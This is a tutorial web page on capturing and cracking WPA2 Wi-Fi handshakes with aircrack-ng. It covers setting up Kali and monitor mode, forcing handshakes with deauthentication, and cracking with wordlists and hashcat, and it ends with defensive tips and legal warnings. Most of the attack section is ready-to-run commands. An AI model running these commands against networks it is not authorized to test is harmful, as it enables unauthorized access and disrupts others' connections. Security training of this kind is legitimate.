π Step-by-Step: WPA2 Password Cracking with Aircrack-ng (Ethical Lab)
β οΈ LEGAL & ETHICAL DISCLAIMER
This guide is for EDUCATIONAL PURPOSES ONLY in authorized lab environments.
Never test networks you don't own or have explicit written permission to test.
Unauthorized access to computer systems is illegal and punishable by law.
This guide is for EDUCATIONAL PURPOSES ONLY in authorized lab environments.
Never test networks you don't own or have explicit written permission to test.
Unauthorized access to computer systems is illegal and punishable by law.
β Prerequisites Before Starting
- β Kali Linux installed or Live USB
- β WiFi Adapter supporting monitor mode
- β Test/Lab network (your own)
- β Wordlists (rockyou.txt, custom dictionaries)
- β Written authorization if testing others' networks
π Recommended WiFi Adapters
- Alfa AWUS036NHA/NH (Best)
- TP-Link TL-WN722N v1
- Panda PAU09
- Raspberry Pi WiFi
πΎ Essential Wordlists
- rockyou.txt (Kali default)
- crunch (for generating)
- crackstation.txt
- Custom wordlists
β οΈ USB drives used for Kali Linux will be completely erased. Backup important data first!
β¬οΈ How to Download Kali Linux ISO
Kali Linux is the preferred distribution for penetration testing and wireless security assessments. It comes pre-installed with Aircrack-ng and other essential security tools.
π‘ Kali Linux is FREE and open-source, specifically designed
for security testing with all tools configured and ready to use.
π ΎοΈ Option 1: Download via Official Kali Website
-
Visit Official Kali Linux Downloads:
https://www.kali.org/get-kali/ - Select Kali Linux 64-Bit (Installer)
- Choose your preferred download method:
- β’ Direct HTTP download
- β’ Torrent (faster for large files)
- β’ Network installer (minimal download)
π‘ The installer ISO is recommended for beginners. It provides graphical installation.
π ΎοΈ Option 2: Download Specific Versions
-
Kali Linux 2024.x Latest Version
https://cdimage.kali.org/kali-2024.x/kali-linux-2024.x-installer-amd64.iso -
Kali Linux Live USB
https://www.kali.org/get-kali/#kali-live -
Kali Linux Virtual Images
https://www.kali.org/get-kali/#kali-virtual-machines
β‘ Live USB version is perfect for testing without installation.
Virtual Machine images work with VMware/VirtualBox.
π Verify ISO Integrity
- Always verify SHA256 checksum
- Compare with official checksums:
- Kali Linux SHA256 Checksums
- Use:
sha256sum kali-linux-*.iso
β οΈ Security First:
Always download from official sources. Avoid third-party websites that may distribute modified or malicious ISOs.
Always download from official sources. Avoid third-party websites that may distribute modified or malicious ISOs.
πΏ Creating Kali Linux Bootable USB with Rufus
Rufus is a free, open-source tool for creating bootable USB drives. It's fast, reliable, and works perfectly with Kali Linux.
πΉ Step 1: Download & Install Rufus
- Visit Rufus Official Website:
https://rufus.ie/ - Download latest version (Portable recommended)
- Insert USB drive (8GB+ recommended)
- Run Rufus (no installation needed)
π‘ Rufus portable version doesn't require installation. Just run the executable.
πΉ Step 2: Configure Rufus Settings
| Setting | Value | Notes |
|---|---|---|
| Device | Your USB drive | Double-check to avoid formatting wrong drive |
| Boot selection | SELECT β Choose Kali ISO | Browse to downloaded Kali Linux ISO |
| Partition scheme | MBR | For BIOS/Legacy systems |
| Target system | BIOS or UEFI-CSM | MBR + BIOS for compatibility |
| File system | FAT32 (Default) | Recommended for bootable USB |
β οΈ Data Loss Warning: USB drive will be completely erased.
Backup any important files before proceeding.
πΉ Step 3: Create Bootable USB
- Click START button
- Warning appears β Click OK
- Select Write in ISO Image mode (Recommended)
- Click OK
- Wait for completion (5-15 minutes)
- Status shows READY when done
- Click CLOSE
- Safely eject USB drive
β
Success: Your Kali Linux bootable USB is ready!
β‘ Booting Kali Linux from USB
Each computer manufacturer uses different keys to access boot menu. You need to select your USB drive as boot device.
πΉ Step 1: Access Boot Menu
| Brand | Boot Menu Key | Alternative Keys |
|---|---|---|
| HP | F9 or ESC | F10 for BIOS |
| Dell | F12 | F2 for BIOS |
| Lenovo | F12 or F1 | Some have Novo button |
| Acer | F12 | F2 or Del |
| Asus | F8 | F2 or Del |
| MSI | F11 | Del for BIOS |
π‘ Press the key repeatedly immediately after powering on the computer.
πΉ Step 2: Select Boot Device
- Turn off computer completely
- Insert Kali Linux USB drive
- Turn on computer
- Immediately press boot menu key
- Select USB HDD: [Your USB Brand]
- Press Enter
πΉ Step 3: Kali Linux Boot Menu
- Select Live system (amd64)
- Or Live system (persistent)
- Kali Linux loads to desktop
- Default credentials:
kali/kali
β
Ready: Kali Linux is now running. Connect your WiFi adapter.
π§ Setting Up Aircrack-ng & WiFi Adapter
πΉ Step 1: Check WiFi Adapter
# Check wireless interfaces
iwconfig
# List available interfaces
sudo airmon-ng
# Detailed hardware info
sudo lshw -C network
π‘ If adapter shows "no wireless extensions", it may not support monitor mode.
πΉ Step 2: Put Adapter in Monitor Mode
# Stop interfering processes
sudo airmon-ng check kill
# Start monitor mode (wlan0 is example)
sudo airmon-ng start wlan0
# Verify monitor mode
sudo iwconfig
β οΈ After starting monitor mode, interface name changes (e.g., wlan0 β wlan0mon)
π― Capturing WPA2 Handshake
πΉ Step 1: Scan for Networks
# Scan all networks
sudo airodump-ng wlan0mon
# Scan specific channel
sudo airodump-ng -c 6 wlan0mon
# Scan 2.4GHz band only
sudo airodump-ng --band bg wlan0monπΉ Step 2: Understand Airodump Output
| Column | Description | Important For |
|---|---|---|
| BSSID | Access Point MAC address | Target identification |
| PWR | Signal strength | Better signal = easier capture |
| #Data | Data packets | Activity level |
| CH | Channel number | Target channel |
| ENC | Encryption type | WPA2 for this guide |
| ESSID | Network name | Target SSID |
πΉ Step 3: Targeted Capture
# Replace with your target values
sudo airodump-ng -c 6 --bssid 00:11:22:33:44:55 -w capture wlan0mon
# Parameters explained:
# -c 6 : Channel number
# --bssid XX:XX : Target AP MAC address
# -w capture : Save to files starting with "capture"
# wlan0mon : Monitor mode interface
π‘ Look for "WPA handshake" message in top-right corner when captured.
πΉ Step 4: Force Handshake (If Needed)
# Open new terminal
# Deauthenticate specific client
sudo aireplay-ng -0 4 -a [BSSID] -c [CLIENT_MAC] wlan0mon
# Broadcast deauth (all clients)
sudo aireplay-ng -0 10 -a [BSSID] wlan0mon
π¨ Use deauthentication ONLY on your own test networks.
Disrupting others' WiFi is unethical and often illegal.
π Cracking with Aircrack-ng
πΉ Step 1: Verify Handshake Capture
# Check if handshake is captured
sudo aircrack-ng capture-01.cap
# Alternative verification
sudo pyrit -r capture-01.cap analyzeπΉ Step 2: Dictionary Attack (Basic)
# Using rockyou.txt (Kali default)
sudo aircrack-ng -w /usr/share/wordlists/rockyou.txt -b [BSSID] capture-01.cap
# Specify exact handshake file
sudo aircrack-ng -w /path/to/wordlist.txt capture-01.capπΉ Step 3: Optimized Attacks
# Combine multiple wordlists
cat wordlist1.txt wordlist2.txt > combined.txt
sudo aircrack-ng -w combined.txt capture-01.cap
# Using crunch for numeric passwords
crunch 8 8 0123456789 -o numlist.txt
sudo aircrack-ng -w numlist.txt capture-01.capπΉ Step 4: GPU Acceleration (Advanced)
# Convert to hashcat format
aircrack-ng capture-01.cap -J output_hash
# Crack with hashcat (GPU)
hashcat -m 22000 output_hash.hccapx rockyou.txt
# Benchmark your system
hashcat -b -m 22000
π‘ GPU cracking is 10-100x faster than CPU. Requires compatible NVIDIA/AMD GPU.
π‘οΈ Defensive Countermeasures
β Strong Password Practices
- Minimum 12 characters
- Mix uppercase, lowercase, numbers, symbols
- Avoid dictionary words
- Use passphrases
- Example:
Tr0ub4dor&3agle$
π§ WiFi Security Settings
- Use WPA3 when available
- Disable WPS (Wi-Fi Protected Setup)
- Hide SSID (limited effectiveness)
- MAC address filtering
- Enterprise WPA2/3
π΅οΈ Detection & Monitoring
# Monitor for deauth attacks
sudo airodump-ng --output-format csv -w monitoring wlan0
# Use WIDS tools
sudo kismet
sudo wiresharkπ§ Common Issues & Solutions
| Problem | Possible Cause | Solution |
|---|---|---|
| Adapter won't go to monitor mode | Driver issues, incompatible hardware | Try different adapter, check driver support |
| No networks detected | Wrong band, driver problem | Check iw list, try 2.4GHz band |
| Handshake not captured | No clients connected, weak signal | Use deauth attack, move closer to AP |
| Password not cracking | Weak wordlist, complex password | Use better wordlists, try rule-based attacks |
| Slow cracking speed | CPU only, large wordlist | Use GPU, optimize wordlist, use hashcat |
βοΈ Ethical & Legal Guidelines
π« CRITICAL WARNING: UNAUTHORIZED ACCESS IS ILLEGAL
Violating computer fraud laws can result in fines and imprisonment.
β Legal & Ethical Uses
- Your own networks
- Authorized testing with written permission
- Educational labs
- Corporate security testing
- CTF competitions
β Illegal & Unethical Uses
- Neighbor's WiFi without permission
- Public hotspots without authorization
- Corporate networks without clearance
- Academic networks without approval
- Any network you don't own
π Required Documentation
- Written authorization from network owner
- Scope of work document
- Non-disclosure agreement
- Liability waiver
- Testing schedule
π Ethical Hacker's Pledge:
"With great power comes great responsibility. I will use my skills only for protection,
never for unauthorized access or harm."